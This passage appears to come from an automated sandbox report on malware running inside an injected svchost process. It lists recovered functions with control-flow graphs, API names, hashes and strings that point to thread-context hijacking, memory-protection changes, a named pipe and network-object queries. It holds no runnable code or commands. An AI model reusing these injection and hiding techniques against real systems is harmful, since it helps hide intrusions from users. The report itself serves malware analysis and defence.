                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction ID: c72e3c920d632f96ad27a50e707b994269e20189d712d4fd065d8c0dcd9fa37d
                                                        • Opcode Fuzzy Hash: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction Fuzzy Hash: 63512972614B85C6EB94CF62E44C35EBBA1F788B99F448124DA4D57B58EF3DC049CB01
                                                        Function 0000026A87996D30 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000003.1826644218.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_3_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: bad array new length
                                                        • API String ID: 190073905-1242854226
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: 0a4f49280b878744ad6f7ecf096596bdefc1ade17dc3b0f03a4227002bb2a120
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: 9B8106317112418AFBE0AB65984D39D77E0FB96780F584025E90877796EF3BC9828F13
                                                        Function 0000026A879C2FA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Running Time
                                                        • API String ID: 1943346504-1805530042
                                                        • Opcode ID: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction ID: 9743a15cf823048b83f34540bfda42efa9d852315c60b7257cefcabb8bc57946
                                                        • Opcode Fuzzy Hash: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction Fuzzy Hash: 7C319132600A41D7FBA0CF22A80C39EBBB0F798B95F444625DE4D63A24DF39C4568B42
                                                        Function 0000026A879C30B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Utilization Percentage
                                                        • API String ID: 1943346504-3507739905
                                                        • Opcode ID: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction ID: 03d1a9572a7d3362d738f50d6cd10881688dd27bf53d8d29efc6c5760e0490ee
                                                        • Opcode Fuzzy Hash: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction Fuzzy Hash: 21315C72610B429AFB90DF66A84C75E7BA1F7D4F85F444125DE4E63B24DF39C4068B02
                                                        Function 0000026A879C2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 238librarystringloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 185 26a879c2c10-26a879c2c8d 187 26a879c2c93-26a879c2c99 185->187 188 26a879c2e8c-26a879c2eaf 185->188 187->188 189 26a879c2c9f-26a879c2ca2 187->189 189->188 190 26a879c2ca8-26a879c2cab 189->190 190->188 191 26a879c2cb1-26a879c2cc1 GetModuleHandleA 190->191 192 26a879c2cc3-26a879c2cd3 GetProcAddress 191->192 193 26a879c2cd5 191->193 194 26a879c2cd8-26a879c2cf6 192->194 193->194 194->188 196 26a879c2cfc-26a879c2d1b StrCmpNIW 194->196 196->188 197 26a879c2d21-26a879c2d25 196->197 197->188 198 26a879c2d2b-26a879c2d35 197->198 198->188 199 26a879c2d3b-26a879c2d3f 198->199 199->188 200 26a879c2d45 199->200 201 26a879c2d4c-26a879c2d5f 200->201 202 26a879c2d6f 201->202 203 26a879c2d61-26a879c2d6d 201->203 204 26a879c2d72-26a879c2d76 202->204 203->204 205 26a879c2d86 204->205 206 26a879c2d78-26a879c2d84 204->206 207 26a879c2d89-26a879c2d93 205->207 206->207 208 26a879c2d99-26a879c2d9c 207->208 209 26a879c2eb0-26a879c2eb4 207->209 212 26a879c2db5-26a879c2db8 208->212 213 26a879c2d9e-26a879c2db2 call 26a879c1934 208->213 210 26a879c2eb6-26a879c2eb9 209->210 211 26a879c2e6e-26a879c2e81 209->211 214 26a879c2ed1-26a879c2ed4 210->214 215 26a879c2ebb-26a879c2ece call 26a879c1934 210->215 211->201 219 26a879c2e87 211->219 217 26a879c2e1f-26a879c2e22 212->217 218 26a879c2dba-26a879c2dc5 212->218 213->212 224 26a879c2ed6-26a879c2ee1 214->224 225 26a879c2f02-26a879c2f05 214->225 215->214 220 26a879c2e34-26a879c2e41 lstrlenW 217->220 221 26a879c2e24 217->221 226 26a879c2dc7-26a879c2dd4 218->226 227 26a879c2dea-26a879c2ded 218->227 219->188 230 26a879c2e43-26a879c2e4f call 26a879c1bf4 220->230 231 26a879c2e55-26a879c2e61 call 26a879c3c70 220->231 228 26a879c2e27-26a879c2e2e call 26a879c1bbc 221->228 224->225 232 26a879c2ee3-26a879c2ef0 224->232 225->220 234 26a879c2f0b-26a879c2f0d 225->234 233 26a879c2dd8-26a879c2dde 226->233 227->217 235 26a879c2def-26a879c2dfa 227->235 228->220 240 26a879c2f19-26a879c2f24 228->240 230->231 250 26a879c2f12 230->250 231->250 251 26a879c2e67 231->251 238 26a879c2ef4-26a879c2efa 232->238 233->240 241 26a879c2de4-26a879c2de8 233->241 234->228 235->217 242 26a879c2dfc-26a879c2e09 235->242 238->240 245 26a879c2efc-26a879c2f00 238->245 247 26a879c2f26-26a879c2f2a 240->247 248 26a879c2f92-26a879c2f99 240->248 241->227 241->233 249 26a879c2e0d-26a879c2e13 242->249 245->225 245->238 252 26a879c2f32-26a879c2f47 call 26a879c89d0 247->252 253 26a879c2f2c-26a879c2f30 247->253 248->211 249->240 254 26a879c2e19-26a879c2e1d 249->254 250->240 251->211 255 26a879c2f4c-26a879c2f4f 252->255 253->252 253->255 254->217 254->249 257 26a879c2f6f-26a879c2f72 255->257 258 26a879c2f51-26a879c2f6a call 26a879c89d0 255->258 257->248 260 26a879c2f74-26a879c2f8d call 26a879c89d0 257->260 258->257 260->248
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProclstrlen
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 3607816002-3850299575
                                                        • Opcode ID: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction ID: a118c866c4c1256a260de1025396f3283f424f8689449a41de93233df7f49ae5
                                                        • Opcode Fuzzy Hash: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction Fuzzy Hash: 43A1BE32210B8186EFA8CF25E44879D7BA5F794B94F544026DE4977B98EF36CC81CB42
                                                        Function 0000026A879C104C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100memoryregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 262 26a879c104c-26a879c10b9 RegQueryInfoKeyW 263 26a879c11b7-26a879c11d2 262->263 264 26a879c10bf-26a879c10c9 262->264 264->263 265 26a879c10cf-26a879c111f RegEnumValueW 264->265 266 26a879c11a7-26a879c11b1 265->266 267 26a879c1125-26a879c112a 265->267 266->263 266->265 267->266 268 26a879c112c-26a879c1137 267->268 269 26a879c1149-26a879c114e 268->269 270 26a879c1139 268->270 272 26a879c1150-26a879c119b GetProcessHeap HeapAlloc GetProcessHeap HeapFree 269->272 273 26a879c119d-26a879c11a5 269->273 271 26a879c113d-26a879c1141 270->271 271->266 274 26a879c1143-26a879c1147 271->274 272->273 273->266 274->269 274->271
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction ID: 647327272fee3884ab25219d834b0645aca49093f317836fe7a307fa954296ab
                                                        • Opcode Fuzzy Hash: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction Fuzzy Hash: 77418073214B80C6EBA0CF62E44839E7BA1F389B89F448119DA8957B58DF3DC549CB01
                                                        Function 0000026A879C2344 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                        • String ID: \\.\pipe\Deadchildproc
                                                        • API String ID: 166002920-2259481039
                                                        • Opcode ID: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction ID: 24d63e7d9458ffa1667c6ee4e7ba688e8a43ab0dcf7cd4f29dc9ada9a4da1437
                                                        • Opcode Fuzzy Hash: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction Fuzzy Hash: C711E236618A4082F750CB25F44835A7FA1F389BA5F544215EAAE17AA8CF7EC549CF02
                                                        Function 0000026A879C7930 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 280 26a879c7930-26a879c7936 281 26a879c7938-26a879c793b 280->281 282 26a879c7971-26a879c797b 280->282 284 26a879c7965-26a879c79a4 call 26a879c7fe0 281->284 285 26a879c793d-26a879c7940 281->285 283 26a879c7a98-26a879c7aad 282->283 289 26a879c7aaf 283->289 290 26a879c7abc-26a879c7ad6 call 26a879c7e74 283->290 302 26a879c7a72 284->302 303 26a879c79aa-26a879c79bf call 26a879c7e74 284->303 287 26a879c7958 __scrt_dllmain_crt_thread_attach 285->287 288 26a879c7942-26a879c7945 285->288 291 26a879c795d-26a879c7964 287->291 293 26a879c7947-26a879c7950 288->293 294 26a879c7951-26a879c7956 call 26a879c7f24 288->294 295 26a879c7ab1-26a879c7abb 289->295 300 26a879c7ad8-26a879c7b0d call 26a879c7f9c call 26a879c7e3c call 26a879c8338 call 26a879c8150 call 26a879c8174 call 26a879c7fcc 290->300 301 26a879c7b0f-26a879c7b40 call 26a879c81b0 290->301 294->291 300->295 312 26a879c7b42-26a879c7b48 301->312 313 26a879c7b51-26a879c7b57 301->313 306 26a879c7a74-26a879c7a89 302->306 315 26a879c79c5-26a879c79d6 call 26a879c7ee4 303->315 316 26a879c7a8a-26a879c7a97 call 26a879c81b0 303->316 312->313 317 26a879c7b4a-26a879c7b4c 312->317 318 26a879c7b59-26a879c7b63 313->318 319 26a879c7b9e-26a879c7bb4 call 26a879c3618 313->319 332 26a879c7a27-26a879c7a31 call 26a879c8150 315->332 333 26a879c79d8-26a879c79fc call 26a879c82fc call 26a879c7e2c call 26a879c7e58 call 26a879c9dfc 315->333 316->283 323 26a879c7c3f-26a879c7c4c 317->323 324 26a879c7b65-26a879c7b6d 318->324 325 26a879c7b6f-26a879c7b7d 318->325 340 26a879c7bb6-26a879c7bb8 319->340 341 26a879c7bec-26a879c7bee 319->341 330 26a879c7b83-26a879c7b98 call 26a879c7930 324->330 325->330 345 26a879c7c35-26a879c7c3d 325->345 330->319 330->345 332->302 355 26a879c7a33-26a879c7a3f call 26a879c81a0 332->355 333->332 380 26a879c79fe-26a879c7a05 __scrt_dllmain_after_initialize_c 333->380 340->341 342 26a879c7bba-26a879c7bdc call 26a879c3618 call 26a879c7a98 340->342 343 26a879c7bf5-26a879c7c0a call 26a879c7930 341->343 344 26a879c7bf0-26a879c7bf3 341->344 342->341 375 26a879c7bde-26a879c7be3 342->375 343->345 363 26a879c7c0c-26a879c7c16 343->363 344->343 344->345 345->323 366 26a879c7a65-26a879c7a70 355->366 367 26a879c7a41-26a879c7a4b call 26a879c80b8 355->367 370 26a879c7c18-26a879c7c1f 363->370 371 26a879c7c21-26a879c7c31 363->371 366->306 367->366 379 26a879c7a4d-26a879c7a5b 367->379 370->345 371->345 375->341 379->366 380->332 381 26a879c7a07-26a879c7a24 call 26a879c9d98 380->381 381->332
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: 3ee43d61a3374edd555b07b018f79bdd43d66c52f438f55532310a519593b204
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: 4381D23160464186FFD0EB36984D3AD7AE4ABC5B80F4C8515EA0977796DB3BC9468F03
                                                        Function 0000026A879C9930 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 384 26a879c9930-26a879c996e 385 26a879c9974-26a879c9977 384->385 386 26a879c9a5f 384->386 387 26a879c9a61-26a879c9a7d 385->387 388 26a879c997d 385->388 386->387 389 26a879c9980 388->389 390 26a879c9986-26a879c9995 389->390 391 26a879c9a57 389->391 392 26a879c9997-26a879c999a 390->392 393 26a879c99a2-26a879c99c1 LoadLibraryExW 390->393 391->386 394 26a879c9a39-26a879c9a48 GetProcAddress 392->394 395 26a879c99a0 392->395 396 26a879c9a19-26a879c9a2e 393->396 397 26a879c99c3-26a879c99cc GetLastError 393->397 394->391 399 26a879c9a4a-26a879c9a55 394->399 400 26a879c9a0d-26a879c9a14 395->400 396->394 398 26a879c9a30-26a879c9a33 FreeLibrary 396->398 401 26a879c99ce-26a879c99e3 call 26a879cae48 397->401 402 26a879c99fb-26a879c9a05 397->402 398->394 399->387 400->389 401->402 405 26a879c99e5-26a879c99f9 LoadLibraryExW 401->405 402->400 405->396 405->402
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(?,?,?,0000026A879C9AEF,?,?,?,0000026A879C98B4,?,?,?,?,0000026A879C94A5), ref: 0000026A879C99B5
                                                        • GetLastError.KERNEL32(?,?,?,0000026A879C9AEF,?,?,?,0000026A879C98B4,?,?,?,?,0000026A879C94A5), ref: 0000026A879C99C3
                                                        • LoadLibraryExW.KERNEL32(?,?,?,0000026A879C9AEF,?,?,?,0000026A879C98B4,?,?,?,?,0000026A879C94A5), ref: 0000026A879C99ED
                                                        • FreeLibrary.KERNEL32(?,?,?,0000026A879C9AEF,?,?,?,0000026A879C98B4,?,?,?,?,0000026A879C94A5), ref: 0000026A879C9A33
                                                        • GetProcAddress.KERNEL32(?,?,?,0000026A879C9AEF,?,?,?,0000026A879C98B4,?,?,?,?,0000026A879C94A5), ref: 0000026A879C9A3F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction ID: a696eec96b6663d70a0885f3b649a6c75654de3abf6a6abb57c31e6ac9d1ae5e
                                                        • Opcode Fuzzy Hash: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction Fuzzy Hash: 3C31C331312A80D1FE95DB46A80879D7BA8B798BB4F5D0525DD6D2B390DF39C444CB02
                                                        Function 0000026A879D1CBC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction ID: 8743c71627c99485b78fe8a65cea421a3187629fbadfe4c96ee6183c145cb0fa
                                                        • Opcode Fuzzy Hash: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction Fuzzy Hash: 1D116A32314B4086F790CB52E85831DBEB4F798FE5F044225EA5E977A4DF7AC8448B41
                                                        Function 0000026A879C5F50 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 427 26a879c5f50-26a879c5f77 428 26a879c5f79-26a879c5f88 427->428 429 26a879c5f8b-26a879c5f96 GetCurrentThreadId 427->429 428->429 430 26a879c5f98-26a879c5f9d 429->430 431 26a879c5fa2-26a879c5fa9 429->431 432 26a879c63cf-26a879c63e6 call 26a879c7d60 430->432 433 26a879c5fbb-26a879c5fcf 431->433 434 26a879c5fab-26a879c5fb6 call 26a879c5d80 431->434 437 26a879c5fde-26a879c5fe4 433->437 434->432 440 26a879c60b5-26a879c60d6 437->440 441 26a879c5fea-26a879c5ff3 437->441 447 26a879c623f-26a879c6250 call 26a879c78df 440->447 448 26a879c60dc-26a879c60fc GetThreadContext 440->448 443 26a879c5ff5-26a879c6038 call 26a879c89d0 441->443 444 26a879c603a-26a879c60ad call 26a879c4930 call 26a879c48d0 call 26a879c4890 441->444 455 26a879c60b0 443->455 444->455 461 26a879c6255-26a879c625b 447->461 452 26a879c6102-26a879c6123 448->452 453 26a879c623a 448->453 452->453 458 26a879c6129-26a879c6132 452->458 453->447 455->437 462 26a879c61b2-26a879c61c3 458->462 463 26a879c6134-26a879c6145 458->463 465 26a879c631e-26a879c632e 461->465 466 26a879c6261-26a879c62b8 VirtualProtect FlushInstructionCache 461->466 467 26a879c6235 462->467 468 26a879c61c5-26a879c61e3 462->468 469 26a879c6147-26a879c615c 463->469 470 26a879c61ad 463->470 471 26a879c633e-26a879c634a call 26a879c5210 465->471 472 26a879c6330-26a879c6337 465->472 474 26a879c62e9-26a879c6319 call 26a879c7ccc 466->474 475 26a879c62ba-26a879c62c4 466->475 468->467 476 26a879c61e5-26a879c622c call 26a879c3d20 468->476 469->470 478 26a879c615e-26a879c61a8 call 26a879c3d90 SetThreadContext 469->478 470->467 491 26a879c634f-26a879c6355 471->491 472->471 479 26a879c6339 call 26a879c4800 472->479 474->461 475->474 481 26a879c62c6-26a879c62e1 call 26a879c47b0 475->481 476->467 492 26a879c6230 call 26a879c78fd 476->492 478->470 479->471 481->474 493 26a879c6397-26a879c63b5 491->493 494 26a879c6357-26a879c6395 ResumeThread call 26a879c7ccc 491->494 492->467 495 26a879c63b7-26a879c63c6 493->495 496 26a879c63c9 493->496 494->491 495->496 496->432
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: d6438e14acddd0a34d7f097f3268bd65991f16ef90fc5aeffdae397213171ed3
                                                        • Instruction ID: d3ece9226342da06a1a3bbaae611955e3353bbe06647f7ca74e4c9e7a4bd6a96
                                                        • Opcode Fuzzy Hash: d6438e14acddd0a34d7f097f3268bd65991f16ef90fc5aeffdae397213171ed3
                                                        • Instruction Fuzzy Hash: 6BD18B76208B8886EAB0DB1AE49835E7BB4F3C9B84F154116EA8D57BA5CF39C541CF01
                                                        Function 0000026A879C31C0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: Dead
